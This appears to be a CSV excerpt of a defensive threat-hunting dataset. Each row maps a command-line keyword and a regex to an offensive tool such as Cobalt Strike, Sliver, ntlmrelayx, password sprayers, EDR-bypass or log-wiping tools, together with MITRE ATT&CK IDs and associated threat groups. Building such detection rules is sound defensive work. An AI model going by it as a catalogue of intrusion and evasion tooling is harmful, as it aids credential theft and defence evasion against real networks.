"* ntlmrelayx.py*",".{0,1000}\sntlmrelayx\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/LuemmelSec/ntlmrelayx.py_to_exe","1","0","N/A","N/A","10","1","86","17","2023-05-26T05:35:52Z","2023-05-15T17:58:26Z","2403"
"* NTLMv1 captured *",".{0,1000}\sNTLMv1\scaptured\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas","1","0","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","2404"
"* ntlmv1.py*",".{0,1000}\sntlmv1\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","2405"
"* --nt-offsets *.csv*",".{0,1000}\s\-\-nt\-offsets\s.{0,1000}\.csv.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","N/A","10","10","1633","292","2024-08-30T20:30:31Z","2021-11-02T15:02:42Z","2406"
"* ntp-info.nse*",".{0,1000}\sntp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2407"
"* ntp-monlist.nse*",".{0,1000}\sntp\-monlist\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2408"
"* nuages.formatImplantLastSeen*",".{0,1000}\snuages\.formatImplantLastSeen.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","0","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","2409"
"* NuagesImplant*",".{0,1000}\sNuagesImplant.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","0","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","2410"
"* nullinux.py*",".{0,1000}\snullinux\.py.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","0","#linux","N/A","7","6","575","101","2024-06-19T14:29:09Z","2016-04-28T16:45:02Z","2411"
"* -o /share/payloads/*",".{0,1000}\s\-o\s\/share\/payloads\/.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","2412"
"* -o cowroot*",".{0,1000}\s\-o\scowroot.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","t1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/exrienz/DirtyCow","1","0","N/A","N/A","N/A","1","28","25","2018-07-23T02:07:24Z","2017-05-12T10:38:20Z","2413"
"* -o ffuf.csv*",".{0,1000}\s\-o\sffuf\.csv.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","#linux","N/A","N/A","10","13818","1373","2025-04-05T17:35:17Z","2018-11-08T09:25:49Z","2414"
"* -o merlin.dll merlin.c *",".{0,1000}\s\-o\smerlin\.dll\smerlin\.c\s.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","2415"
"* -o moonwalk*",".{0,1000}\s\-o\smoonwalk.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","0","#linux","N/A","10","10","1440","129","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z","2416"
"* -o simpleXORencoder*",".{0,1000}\s\-o\ssimpleXORencoder.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","2417"
"* -o sliver-server*",".{0,1000}\s\-o\ssliver\-server.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","2418"
"* -o sprayed.txt*",".{0,1000}\s\-o\ssprayed\.txt.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","0","N/A","N/A","10","2","130","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z","2419"
"* -o:badrat.xll *",".{0,1000}\s\-o\:badrat\.xll\s.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","N/A","10","1","N/A","N/A","N/A","N/A","2420"
"* o365_enum_activesync.py*",".{0,1000}\so365_enum_activesync\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","2421"
"* o365_enum_office.py*",".{0,1000}\so365_enum_office\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","2422"
"* o365_enum_onedrive.py*",".{0,1000}\so365_enum_onedrive\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","2423"
"* o365_spray_activesync.py*",".{0,1000}\so365_spray_activesync\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","2424"
"* o365_spray_adfs.py*",".{0,1000}\so365_spray_adfs\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","2425"
"* o365_spray_msol.py*",".{0,1000}\so365_spray_msol\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","2426"
"* o365spray.py*",".{0,1000}\so365spray\.py.{0,1000}","offensive_tool_keyword","o365spray","Username enumeration and password spraying tool aimed at Microsoft O365","T1110.003 - T1087.002","TA0007 - TA0006","N/A","N/A","Credential Access","https://github.com/0xZDH/o365spray","1","0","N/A","N/A","8","9","846","100","2024-11-06T00:49:23Z","2019-08-07T14:47:45Z","2427"
"* -oA icebreaker-scan*",".{0,1000}\s\-oA\sicebreaker\-scan.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","2428"
"* --obfs --amsi-bypass *",".{0,1000}\s\-\-obfs\s\-\-amsi\-bypass\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","2429"
"* --obfuscate *",".{0,1000}\s\-\-obfuscate\s.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","2430"
"* Obfuscated-Code.py*",".{0,1000}\sObfuscated\-Code\.py.{0,1000}","offensive_tool_keyword","var0xshell","var0xshell - shell with xor encryption","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/var0xshell/tree/main","1","0","N/A","N/A","8","10","4","1","2023-01-09T06:53:42Z","2023-01-08T21:34:26Z","2431"
"* obfuscation.exe --help*",".{0,1000}\sobfuscation\.exe\s\-\-help.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","2432"
"* octopus.py*",".{0,1000}\soctopus\.py.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1059.001 - T1105 - T1071.001 - T1219 - T1573","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","0","N/A","N/A","10","10","750","156","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z","2433"
"* office2john.py*",".{0,1000}\soffice2john\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","2434"
"* OfficePersistence.ps1*",".{0,1000}\sOfficePersistence\.ps1.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","0","N/A","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z","2435"
"* oh365userfinder.py*",".{0,1000}\soh365userfinder\.py.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","2437"
"* -old-bloodhound*",".{0,1000}\s\-old\-bloodhound.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1552.003 - T1110.003 - T1550.004 - T1649","TA0006 - TA0008 - TA0003","N/A","Dispossessor","Exploitation tool","https://github.com/ly4k/Certipy","1","0","N/A","N/A","10","10","2704","380","2024-08-19T17:33:04Z","2021-10-06T23:02:40Z","2438"
"* omnispray.py*",".{0,1000}\somnispray\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","2440"
"* omp2-brute.nse*",".{0,1000}\somp2\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2441"
"* omp2-enum-targets.nse*",".{0,1000}\somp2\-enum\-targets\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2442"
"* omron-info.nse*",".{0,1000}\somron\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2443"
"* --onefile Checkmate.py*",".{0,1000}\s\-\-onefile\sCheckmate\.py.{0,1000}","offensive_tool_keyword","Checkmate","payload Execution by Fake Windows SmartScreen with requires Administrator privileges & Turn off real SmartScreen Filter","T1059 - T1070 - T1546","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/S3N4T0R-0X0/Checkmate","1","0","N/A","N/A","9","1","95","16","2024-01-12T19:03:45Z","2024-01-04T15:56:37Z","2445"
"* --oneliner-nothidden*",".{0,1000}\s\-\-oneliner\-nothidden.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","2446"
"* onesixtyone.c*",".{0,1000}\sonesixtyone\.c.{0,1000}","offensive_tool_keyword","onesixtyone","Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/trailofbits/onesixtyone","1","0","N/A","N/A","N/A","6","594","90","2023-04-11T18:21:38Z","2014-02-07T17:02:49Z","2447"
"* --only-abuse --dc-host *",".{0,1000}\s\-\-only\-abuse\s\-\-dc\-host\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2448"
"* --only-known-exploit-paths*",".{0,1000}\s\-\-only\-known\-exploit\-paths.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","2449"
"* openflow-info.nse*",".{0,1000}\sopenflow\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2450"
"* openlookup-info.nse*",".{0,1000}\sopenlookup\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2451"
"* openvas-otp-brute.nse*",".{0,1000}\sopenvas\-otp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2452"
"* openwebnet-discovery.nse*",".{0,1000}\sopenwebnet\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2453"
"* options.fake_hostname*",".{0,1000}\soptions\.fake_hostname.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","7","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","2454"
"* oracle-brute.nse*",".{0,1000}\soracle\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2455"
"* oracle-brute-stealth.nse*",".{0,1000}\soracle\-brute\-stealth\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2456"
"* oracle-enum-users.nse*",".{0,1000}\soracle\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2457"
"* oracle-sid-brute.nse*",".{0,1000}\soracle\-sid\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2458"
